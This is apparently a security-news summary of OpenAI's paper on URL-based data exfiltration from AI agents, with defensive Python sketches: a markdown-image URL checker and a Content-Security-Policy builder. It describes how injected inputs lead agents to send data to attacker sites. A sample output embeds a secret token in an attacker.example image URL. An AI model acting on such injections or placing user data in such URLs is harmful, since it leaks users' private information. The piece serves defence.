AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

OpenAI Explains URL-Based Data Exfiltration Mitigations in New Paper

info, news, LLM-Specific

security, research

Source: Embrace The Red, February 5, 2026

Summary

OpenAI published a paper describing new mitigations for URL-based data exfiltration (a technique where attackers trick AI agents into sending sensitive data to attacker-controlled websites by embedding malicious URLs in inputs). The issue was first reported to OpenAI in 2023 but received little attention at the time; Microsoft, by contrast, implemented a fix for the same vulnerability in Bing Chat.
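To make the technique concrete, here is a minimal sketch of how a defender might flag the pattern in model output. It assumes the exfiltration URL arrives as a markdown image link and that the application keeps an allowlist of trusted hosts. The names `TRUSTED_HOSTS` and `find_suspicious_image_urls`, and the hosts themselves, are hypothetical and not taken from OpenAI's paper or the source article.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would choose its own trusted hosts.
TRUSTED_HOSTS = {"example.com"}

# Matches markdown image syntax ![alt](url) and captures the URL.
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\((\S+?)\)")


def find_suspicious_image_urls(model_output: str) -> list[str]:
    """Return image URLs in the model output whose host is not on the allowlist."""
    suspicious = []
    for url in MARKDOWN_IMAGE.findall(model_output):
        host = urlparse(url).hostname or ""
        if host not in TRUSTED_HOSTS:
            suspicious.append(url)
    return suspicious


# Illustrative output in which injected instructions caused the model to
# append private data to the query string of an attacker-controlled URL.
output = (
    "Here is your summary. "
    "![status](https://attacker.example/log?q=secret-token-123)"
)
flagged = find_suspicious_image_urls(output)
print(flagged)
```

If the client rendered that image, the request itself would deliver the query string to the attacker's server, which is why the check runs before rendering.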

Solution / Mitigation

In May 2023, Microsoft applied a fix using a Content-Security-Policy header (a security rule that controls which external resources a webpage can load), which generally prevents images from loading. OpenAI's own mitigations are discussed in its new paper, 'Preventing URL-Based Data Exfiltration in Language-Model Agents', but this source text does not describe them in detail.
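As a rough illustration of the header-based approach, the sketch below builds a Content-Security-Policy header that restricts image loading with the standard `img-src` directive. This is not Microsoft's actual policy, which the source does not give. The helper `build_csp_header` and the host `images.example.com` are hypothetical.

```python
def build_csp_header(allowed_image_hosts: list[str]) -> tuple[str, str]:
    """Build a CSP header that only lets images load from the given hosts.

    Assumption: images from the page's own origin ('self') remain allowed.
    """
    sources = ["'self'"] + [f"https://{host}" for host in allowed_image_hosts]
    policy = "img-src " + " ".join(sources)
    return ("Content-Security-Policy", policy)


# Hypothetical host for illustration only.
name, value = build_csp_header(["images.example.com"])
print(f"{name}: {value}")
```

With such a policy in place, a browser would refuse to fetch an image from any host not listed, so a URL carrying data to an attacker's server would not be requested when rendered as an image.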